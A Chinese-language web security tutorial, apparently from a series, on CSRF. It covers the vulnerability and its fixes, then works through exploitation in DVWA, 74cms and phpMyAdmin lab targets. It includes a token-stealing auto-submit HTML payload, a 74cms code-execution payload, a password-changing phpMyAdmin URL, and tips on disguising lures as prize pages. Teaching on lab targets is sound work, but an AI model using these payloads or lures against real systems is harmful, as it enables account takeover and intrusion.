本文由紅日安全成員： Once 編寫，如有不當，還望斧正。

大家好，我們是紅日安全-Web安全攻防小組。此專案是關於Web安全的系列文章分享，還包含一個HTB靶場供大家練習，我們給這個專案起了一個名字叫 Web安全實戰 ，希望對想要學習Web安全的朋友們有所幫助。每一篇文章都是於基於漏洞簡介-漏洞原理-漏洞危害-測試方法（手工測試，工具測試）-靶場測試（分為PHP靶場、JAVA靶場、Python靶場基本上三種靶場全部涵蓋）-實戰演練（主要選擇相應CMS或者是Vulnhub進行實戰演練)，如果對大家有幫助請Star鼓勵我們創作更好文章。如果你願意加入我們，一起完善這個專案，歡迎通過郵件形式（[email protected]）聯絡我們。

1.1 CSRF漏洞

1.1.1 CSRF漏洞簡介

CSRF（跨站請求偽造），是指利用受害者尚未失效的身份認證資訊（ cookie、會話
等），誘騙其點選惡意連結或者訪問包含攻擊程式碼的頁面，在受害人不知情的情況下
以受害者的身份向（身份認證資訊所對應的）伺服器傳送請求，從而完成非法操作
（如轉賬、改密等）。CSRF與XSS最大的區別就在於，CSRF並沒有盜取cookie而是直接利用

1.1.2 CSRF漏洞分類

1.1.2.1 GET型

GET型CSRF漏洞，只需要構造URL，然後誘導受害者訪問利用。

1.1.2.2 POST型

POST型CSRF漏洞，需要構造自動提交或點選提交的表單，然後誘導受害者訪問或點選利用。

1.1.3 CSRF漏洞危害

未驗證 Referer或者使用 Token 導致使用者或者管理員可被 CSRF新增、修改、刪除等操作

1.1.4 CSRF漏洞修復方案

1、新增隨機token值，並驗證。
2、驗證Referer
3、關鍵請求使用驗證碼功能

1.2 CSRF漏洞利用

1.2.1 利用思路

尋找增刪改的地方，構造HTML，修改HTML表單中某些引數，使用瀏覽器開啟該HTML，點選提交表單後檢視響應結果，看該操作是否成功執行。

1.2.2 工具使用

1.2.2.1 burpsuite

使用burpsuite中Engagement tools的Generate CSRF PoC模組
右擊要csrf攻擊的url，選擇Generate CSRF POC模組

然後就構造好了攻擊指令碼，value就是要修改成的密碼

Test in browser一般用於自己測試用

然後點選copy

然後用代理burpsuite的瀏覽器開啟

點選submit request即可修改成功密碼

Copy HTML 一般用於攻擊其他人，複製下程式碼儲存為HTML文件
可以簡單修改箇中獎頁面，誘惑受害者點選


點選領獎成功修改密碼

1.2.2.2 CSRFTester

下載地址：https://www.owasp.org/index.php/File:CSRFTester-1.0.zip

下載後點擊run.bat

正常開啟，並監聽8008埠，需要把瀏覽器代理設定為8008

點選Start Recording，開啟CSRFTester檢測工作，我們這裡抓新增管理員的資料包

然後右擊刪除沒用的資料包

點選Generate HTML生成CSRF攻擊指令碼，我們這次新增test1賬號

開啟此檔案，成功新增賬號

1.2.2 CSRF漏洞利用例項之DVWA

1.2.2.1 安裝步驟

下載地址：https://codeload.github.com/ethicalhack3r/DVWA/zip/master
漏洞環境：windows、phpstudy
先把config目錄下config.inc.php.dist檔名修改為config.inc.php，資料庫密碼修改為自己的。

然後訪問dvwa，因為csrf漏洞不涉及紅色部分配置，直接建立即可

建立成功，賬號密碼是admin/password

這裡可以調相應的安全等級

1.2.2.2 low等級

從程式碼中可以看出未作任何防禦，直接更改密碼。

if( isset( $_GET[ 'Change' ] ) ) {
   // Get input
   $pass_new  = $_GET[ 'password_new' ];
   $pass_conf = $_GET[ 'password_conf' ];

   // Do the passwords match?
   if( $pass_new == $pass_conf ) {
      // They do!
      $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
      $pass_new = md5( $pass_new );

      // Update the database
      $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
      $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

      // Feedback for the user
      $html .= "<pre>Password Changed.</pre>";
   }
   else {
      // Issue with passwords matching
      $html .= "<pre>Passwords did not match.</pre>";
   }

   ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

先使用burpsuite進行抓修改密碼的資料包

再使用Generate CSRF PoC進行構造poc

CSRF HTML中的程式碼是構造好的

把構造好的程式碼複製出來，複製到自己建立的HTML檔案裡，value裡的值是要修改成的密碼。

點選submit request即可修改

修改成功

1.2.2.3 medium等級

從程式碼中可以看出先檢測referer是否包含主機名稱，再進行更改密碼。

if( isset( $_GET[ 'Change' ] ) ) {
   // Checks to see where the request came from
   if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
      // Get input
      $pass_new  = $_GET[ 'password_new' ];
      $pass_conf = $_GET[ 'password_conf' ];

      // Do the passwords match?
      if( $pass_new == $pass_conf ) {
         // They do!
         $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
         $pass_new = md5( $pass_new );

         // Update the database
         $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
         $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

         // Feedback for the user
         $html .= "<pre>Password Changed.</pre>";
      }
      else {
         // Issue with passwords matching
         $html .= "<pre>Passwords did not match.</pre>";
      }
   }
   else {
      // Didn't come from a trusted source
      $html .= "<pre>That request didn't look correct.</pre>";
   }

   ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

先看下phpinfo中SERVER_NAME是什麼

訪問poc，並抓包修改referer，新增localhost進行繞過

修改成功

1.2.2.4 high等級

從程式碼可以看出增加了Anti-CSRF token機制，使用者每次訪問更改頁面時，伺服器都會返回一個隨機token，向伺服器傳送請求時，並帶上隨機token，服務端接收的時候先對token進行檢查是否正確，才會處理客戶端請求。

if( isset( $_GET[ 'Change' ] ) ) {
   // Check Anti-CSRF token
   checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

   // Get input
   $pass_new  = $_GET[ 'password_new' ];
   $pass_conf = $_GET[ 'password_conf' ];

   // Do the passwords match?
   if( $pass_new == $pass_conf ) {
      // They do!
      $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
      $pass_new = md5( $pass_new );

      // Update the database
      $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
      $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

      // Feedback for the user
      $html .= "<pre>Password Changed.</pre>";
   }
   else {
      // Issue with passwords matching
      $html .= "<pre>Passwords did not match.</pre>";
   }

   ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token

generateSessionToken();

要繞過Anti-CSRF token機制，首先要獲取token，再使用這個token進行修改密碼。
然後構造以下程式碼

<html>
<body>
<script type="text/javascript">
    function attack()
  {
   document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
  document.getElementById("transfer").submit(); 
  }

</script>
<iframe src="http://192.168.1.108/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;">

</iframe>
<body onload="attack()">

  <form method="GET" id="transfer" action="http://192.168.1.108/dvwa/vulnerabilities/csrf">

   <input type="hidden" name="password_new" value="hongri">

    <input type="hidden" name="password_conf" value="hongri">

   <input type="hidden" name="user_token" value="">

  <input type="hidden" name="Change" value="Change">

   </form>

</body>
</html>

訪問後就立即修改密碼

1.2.2.5 參考文章

https://www.freebuf.com/articles/web/118352.html

1.2.3 CSRF漏洞利用例項之騎士cms

1.2.3.1 安裝步驟

騎士cms下載地址：http://www.74cms.com/download/load/id/155.html
漏洞環境：windows、phpstudy
存在漏洞：POS型CSRF、程式碼執行

下載解壓，訪問首頁

填寫資訊

安裝完成

1.2.3.2 利用過程

安裝好後，進入新增管理員介面進行抓包


使用Generate CSRF PoC生成HTML程式碼，並添加個中獎圖片，簡單偽裝成中獎頁面。

還可以用短域名繼續偽裝

然後誘導管理員開啟並點選，建立成功

使用建立的賬號密碼登入

使用程式碼執行漏洞執行phpinfo
poc：index.php?m=Admin&c=Tpl&a=set&tpl_dir=a'.${phpinfo()}.'

1.2.3.3 參考文章

http://www.yqxiaojunjie.com/index.php/archives/341/

1.2.4 CSRF漏洞利用例項之phpMyAdmin

1.2.4.1 安裝步驟

此漏洞使用VulnSpy線上靶機
靶機地址：https://www.vulnspy.com/?u=pmasa-2017-9
存在漏洞：GET型CSRF
點選開啟實驗

可以登入也可以不登入

開啟靶機地址，預設賬號密碼：root/toor，靶機只有十分鐘的時間

1.2.4.2 利用過程

將當前使用者密碼更改為hongri，SQL命令

SET passsword=PASSWORD('hongri');

構造poc

http://f1496b741e86dce4b2f79f3e839f977d.vsplate.me:19830/pma/sql.php?db=mysql&table=user&sql_query=SET%20password
%20=%20PASSWORD(%27hongri%27)

我們可以使用短域名偽裝

修改成功

1.2.4.3 參考文章

https://www.vulnspy.com/?u=pmasa-2017-9

相關推薦